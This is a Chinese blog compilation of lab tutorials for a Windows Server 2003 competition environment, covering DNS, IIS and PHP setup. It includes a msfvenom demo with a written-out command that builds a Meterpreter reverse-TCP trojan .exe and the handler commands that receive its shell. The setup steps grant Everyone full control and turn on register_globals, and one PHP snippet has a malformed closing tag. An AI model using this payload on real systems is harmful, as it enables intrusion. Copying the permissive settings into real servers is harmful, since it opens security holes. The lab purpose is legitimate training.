2019年12月

前言:忍不住爆粗口了,操蛋的比赛主办方(博客中搭建的实验环境多为站长为准备全国技能大赛用的),IIS6这种祖传的web服务器你也用来做比赛环境?妈的搭建起来问题一个接一个多,所以遇到很多关键的操作IIS6根本没法解决,为了替代实验中的一部分操作,站长搭建了phpstudy环境,真香!

phpstudy下载

vc9支持库下载

下载好两个文件之后无脑安装即可,phpstudy可以用作web站点容器,做实验都是非常好用。

安装好后打开phpstudy

本次搭建的是实验环境,请勿在生产环境使用

0x00.如果是虚拟机需要分配光驱,把原先安装虚拟机的镜像挂载到虚拟机上,具体操作是点击虚拟机窗口上方的“设备”–>分配光驱–>然后找到你安装虚拟机时的镜像文件,选中即可

0x01.系统桌面点击左下角的开始-->管理您的服务器

点击下一步

0x02.选中DNS服务器,点击下一步

下一步-->弹出个窗口,点下一步就好

下一步-->下一步-->下一步

0x03.区域名称填个主域名,XXXXX.XX这种格式,下一步-->下一步-->下一步

否就好,这里我们是在局域网环境下使用,不用搞那么多花里胡哨

完成-->完成

0x04.按照顺序打开DNS管理器

右击我们刚才建立的域名,然后点击新建主机

0x05.主机记录填www,ip地址填我们本机即可,点添加主机完成

0x06.下一步是自定义DNS服务器

按照顺序点击,然后填写我们刚才创建的DNS服务器,如果不填备用DNS服务器,会出现上不了外网的情况,确定完成即可。

0x07.在windows_server上搭建网站(web服务)请看这里

0x08.最后,在浏览器中分别用域名跟ip地址进行访问,效果一致,DNS解析成功

前言:使用的是windows_server-2003,其他版本服务器大同小异

本次是搭建实验环境,请勿在生产环境下使用

0x00.如果是虚拟机需要分配光驱,把原先安装虚拟机的镜像挂载到虚拟机上,具体操作是点击虚拟机窗口上方的“设备”-->分配光驱-->然后找到你安装虚拟机时的镜像文件,选中即可

0x01.在主界面点击左下角的开始按钮

0x02.点击管理您的服务器

0x03.添加角色或服务-->下一步

0x04.单击选中"应用程序服务器"-->下一步-->下一步

0x05.选中挂载的镜像

0x06.IIS安装完成

0x07.主界面点击开始-->管理工具-->Internet信息服务(IIS)管理器

0x08.在IIS管理器双击网站文件夹会出现一个默认站点,浏览器输入ip地址即可访问网页,网站根目录可以右击默认站点-->属性-->主目录查看

0x09.如果打开网页显示401.3,是访问权限问题

解决方法是:

1.右击默认站点-->属性-->目录安全性-->编辑,可以查看当前匿名访问使用的系统账号,

2.再右击默认站点-->权限-->找到刚才那个系统用户选中-->在user权限那里给予完全控制权限。

3.在文件管理器找到上面提到的网站的根目录,右击网站根目录-->属性-->安全-->可以添加一个Everyone用户,给予完全访问权限。

4.问题解决。可以访问网站了

0x0a.然后把网站程序放在网站根目录下即可运行,如果需要添加php支持,可以查看这里

0x0b.如需做DNS解析,请点击这里

前言:

下面简单的演示一下msfvenom的简单使用,

攻击者:kali Linux  ip:172.30.23.44

靶机:Windows_server-2003

思路:利用msfvenom制作 .exe 文件,然后发送到靶机Windows上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机

0x01.利用msfvenom生成木马文件

1.在kali终端输入下面命令查看可用payload

msfvenom -lp

这里我们使用下面红色方框中的payload

下面是使用msfvenom的部分参数,是比较常用的

-p 选择一个payload

-l 载荷列表

-f 生成的文件格式

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。

-h 帮助

2.生成木马文件的命令是“msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali_linux本机IPv4地址] LPORT=80 -f exe -o trojanhorse.exe”,命令中,-p参数是使用指定payload模块,-f 指定格式,-o指定输出路径。

木马已经生成在了kali主目录下

0x02.利用web漏洞和社会工程学等手段让木马程序在受害机运行,这里不详说

0x03.利用msfconsole监听

依次输入下面命令,设置监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 172.30.23.44

set lport 80

exploit

上图监听开始了,等待目标运行木马程序,我直接在靶机点击运行

0x03.当靶机运行木马程序,会反弹一个shell到我的kali,接下来就可以为所欲为

本次搭建的是实验环境,生产环境下请慎用

在windows服务器创建网站(web服务)请看这里

PHP5.2.2下载地址

0x00.下载好后解压到C盘,命名为php

0x01.将C:\php目录下的php.ini-dist文件改名为php.ini,然后拷到C:\Windows目录下

0x02.用记事本打开C:\Windows目录php.ini文件php.ini里找到register_globals = Off 将 Off 改成 On。再找到extension_dir = "./" 吧"./"里的./改成php里的ext所在的位置,如"C:\php\ext"。最后将php目录下的php5ts.dll拷到C:\WINDOWS\system32目录下。至此完成PHP的安装步骤。

0x03.开启常用的扩展,即去掉相应;extension=XXX.dll前面的分号
下面为常用扩展

extension=php_curl.dll
extension=php_gd2.dll        ;图形处理用,比如图片缩放,水印
extension=php_mbstring.dll   ;phpmyadmin需要
extension=php_mcrypt.dll
extension=php_mhash.dll
extension=php_mssql.dll      ;sqlserver需要
extension=php_mysql.dll      ;mysql需要
extension=php_mysqli.dll     ;同上
extension=php_pdo.dll
extension=php_pdo_mssql.dll
extension=php_pdo_mysql.dll
extension=php_pdo_sqlite.dll

0x04.设置iis支持

1.选中“Internet 信息服务(IIS)管理器”→“网站”→“默认网站”→“属性”→“主目录”→“配置映射”→添加可执行文件:php目录下的php5isapi.dll扩展名:.PHP。添加首页默认文件。选中“Internet 信息服务(IIS)管理器”→“网站”→“默认网站”→“属性”→“主目录”→“文档”。添加index.php首页文件。

2.设定PHP文件夹权限。打开PHP文件夹,添加everyone和IUSR及IWAM用户权限。查看相关资料说只需添加IUSR用户权限就可以但我个人试过如果不加入everyone用户则执行不成功。如果设定有误欢迎指正。因为加入everyone不能保证安全。设定网站文件夹权限。具体设定如上所述。只是文件夹路径不一样。

0x05.测试效果,在网站目录创建一个info.php文件,内容如下:

<?php
phpinfo();
>

0x06.成功